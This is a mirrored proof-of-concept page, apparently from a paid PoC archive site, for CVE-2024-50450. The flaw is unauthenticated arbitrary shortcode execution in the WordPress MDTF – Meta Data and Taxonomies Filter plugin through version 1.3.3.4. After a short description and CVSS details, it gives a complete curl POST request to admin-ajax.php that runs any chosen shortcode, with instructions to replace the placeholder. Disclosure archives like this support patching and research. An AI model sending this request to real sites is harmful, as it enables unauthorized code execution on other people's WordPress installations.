Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-50450 PoC — WordPress MDTF – Meta Data and Taxonomies Filter plugin <= 1.3.3.4 - Bypass Vulnerability vulnerability

Source
Associated Vulnerability
Title:WordPress MDTF – Meta Data and Taxonomies Filter plugin <= 1.3.3.4 - Bypass Vulnerability vulnerability (CVE-2024-50450)
Description:Improper Control of Generation of Code ('Code Injection') vulnerability in RealMag777 MDTF wp-meta-data-filter-and-taxonomy-filter allows Code Injection.This issue affects MDTF: from n/a through <= 1.3.3.4.
Description
WordPress Meta Data and Taxonomies Filter (MDTF) <= 1.3.3.4 - Unauthenticated Arbitrary Shortcode Execution
Readme
# CVE-2024-50450
WordPress Meta Data and Taxonomies Filter (MDTF) &lt;= 1.3.3.4 - Unauthenticated Arbitrary Shortcode Execution

# Description:
The The MDTF – Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.3.3.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

```
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50450
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVSS Score: 7.3
Slugs: wp-meta-data-filter-and-taxonomy-filter
```

POC
---

Change [contact_7] to the shortcut code you want to run.

```
curl -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=mdf_get_ajax_auto_recount_data" \
  -d "mdf_front_qtrans_lang=en" \
  -d "mdf_front_wpml_lang=en" \
  -d "mdf_is_search_going=1" \
  -d "mdf_tmp_order=asc" \
  -d "mdf_tmp_orderby=date" \
  -d "no_wp_die=true" \
  -d "mdf_ajax_request=true" \
  -d "mdf_cat=category_slug" \
  -d "page_mdf=1" \
  -d "slug=page_slug" \
  -d "type=shortcode" \
  -d "shortcode_id=shortcode_id_value" \
  -d "mdf_ajax_content_redraw=true" \
  -d "shortcode_txt=[contact_7]" \
  http://kubernetes.docker.internal/wp-admin/admin-ajax.php
```
File Snapshot

[4.0K] /data/pocs/b684e98b395675555ba93d6bf1f14ec053f5de10 └── [1.3K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →